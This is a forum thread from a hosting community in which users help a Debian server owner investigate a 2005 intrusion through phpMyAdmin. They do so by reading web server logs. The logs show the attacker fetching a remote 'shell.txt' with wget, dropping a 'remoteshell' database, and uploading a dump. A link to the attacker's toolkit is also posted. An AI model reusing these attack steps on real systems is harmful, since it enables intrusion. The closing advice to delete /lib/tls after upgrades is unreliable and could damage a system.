Hello,

It looks like someone decided to exploit something on my system and setup a ftp site. Must have killed them with the small space. Regardless, it appears that they exploited it somehow using the www-data user that Debian setup. I am running the testing. Does anyone know what could have been used to open the exploit? I want to patch it ASAP.

Thanks!

What web applications you have on your website? One of them may have a vulnerability some attacker used to gain access to your Linode.

I'm thinking it was phpmyadmin that allowed it. There was a file named old.php with mysql/mysql as the owner. I've removed it now. It looks like the person was using quite a few tools to mess with my system. I'm an idiot. Oh well.... live and learn. I guess the best part is I have the IP's of the person who created/accessed and all of the people who were downloading the software off of my system. I think I'm going to contact their ISP's.

Review your webserver logs, see what they did. I'd love to know what they exploited. I'm willing to spend a few minutes and review your webserver logs if you want.

Thanks. I'll post them... I'll tar the entire package

http://www.avella.name/hack.tar

The tar is almost 26 megs. It includes their little toolkit. I found it because I did a ps -ax like I normally do and saw ./ftpd running... First clue that wasnt me.... Thanks!

Oh! the old.php was in my /var/www directory with the owner of mysql:mysql

[Fri Dec 30 19:22:42 2005] [error] [client 84.159.66.132] File does not exist: /var/www/avella/phpmyadmin/css/themes, referer: http://www.avella.name/phpmyadmin
/css/phpmyadmin.css.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&js_frame=right&js_isDOM=1
--19:22:59--  http://mitglied.lycos.de/oldmeal1/shell.txt
           => `shell.txt'
Resolving mitglied.lycos.de... 212.78.204.20
Connecting to mitglied.lycos.de|212.78.204.20|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5,211 (5.1K) [text/plain]

    0K .....                                                 100%   34.71 KB/s

19:23:00 (34.71 KB/s) - `shell.txt' saved [5211/5211]

That's from your error log, can you tar up (and gzip please) your access log for 12/30/2005?

Looks like they were xfering through your Linode this game:

http://www.torrentz.com/torrent_381534.html

They may have exploited some portion of MySQL through phpMyAdmin, using a database called remoteshell:

84.159.66.132 - - [30/Dec/2005:19:21:57 -0500] "GET /phpmyadmin/sql.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=remoteshell&goto=db_details_structure.php&sql_query=DROP+DATABASE+
%60remoteshell%60&zero_rows=Datenbank+%60remoteshell%60+wurde+gel%C3%B6scht.&goto=main.php&back=db_details_structure.php&reload=1&purge=1&is_js_confirmed=1 HTTP/1.1" 200 6635 "http://www.avella.name/ph
pmyadmin/db_details_structure.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=remoteshell" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8) Gecko/20051111 Firefox/1.5"

Then they restored a database dump via POST:

84.159.66.132 - - [30/Dec/2005:19:22:20 -0500] "POST /phpmyadmin/read_dump.php HTTP/1.1" 200 4760 "http://www.avella.name/phpmyadmin/db_details.php?lang=de-utf-8&server=1&collation_connection=utf8_gene
ral_ci&db=mysql&goto=db_details_structure.php&db_query_force=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8) Gecko/20051111 Firefox/1.5"

And they did another database dump via POST, which somehow resulted in /old.php getting created.

Because access logs don't log POST data, I can't tell exactly what happened, but I can make an educated guess. The above wget command in the error logs were probally caused by phpmyadmin.css.php, mis-parsing the contents of a database in MySQL. It looks like it may have made PHP execute some PHP code that resided in the remoteshell database.

Can you dump that database to a text file if you've still got it?

[will edit later with more info dug up]

Thanks for your help!

Can you dump the remoteshell mysql database to a text file using mysqldump?

I've never done it before but I'll give it a try.... hold.

Starting MySQL database server: mysqld...failed.
Please take a look at the syslog.
/usr/bin/mysqladmin: connect to server at 'localhost' failed
error: 'Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)'
Check that mysqld is running and that the socket: '/var/run/mysqld/mysqld.sock' exists!

I rebooted my system to make sure that no other programs were running that I wasn't aware of...

If you have an idea as how to restore the mysql server, I'll give the dump. I'm off to bed right now since I have to be at work in 5 hours. Thanks for your help and I'll follow-up tomorrow.

It looks like mysqld isn't running. Try starting it via /etc/init.d/mysqld start (if you're running a SysV style distro)

mysqldump -u root -p remoteshell > remoteshell.txt
(the enter your root mysql password at the prompt)

I suffered a similar problem recently which kept killing my MYSQL Server.

Fortunately it restarted with a reboot.

I found a directory under /var/tmp/ that had no name but appeared to contain some sort of pseudo server.

It may be worth checking for this folder.

I checked the folder and kept all of the info. When I run /etc/init.d/mysql start I receive the message above. If I type just mysqld I get the following:

avella:~# mysqld
060103 19:13:11 InnoDB: Database was not shut down normally!
InnoDB: Starting crash recovery.
InnoDB: Reading tablespace information from the .ibd files...
InnoDB: Restoring possible half-written data pages from the doublewrite
InnoDB: buffer...
060103 19:13:12 InnoDB: Starting log scan based on checkpoint at
InnoDB: log sequence number 0 47300.
InnoDB: Doing recovery: scanned up to log sequence number 0 47346
InnoDB: Last MySQL binlog file position 0 79, file name /var/log/mysql/mysql-bin.000121
060103 19:13:12 InnoDB: Flushing modified pages from the buffer pool...
060103 19:13:12 InnoDB: Started; log sequence number 0 47346
060103 19:13:12 [ERROR] Fatal error: Can't open and lock privilege tables: Table 'mysql.host' doesn't exist

I'm lost... I don't want to potentially loose what they posted. How can I go about restoring my data?

Did you do "apt-get upgrade" recently? If so, check if /lib/tls exists. That is evil. You got to watch for it when you do upgrade and remove it every time it shows up again.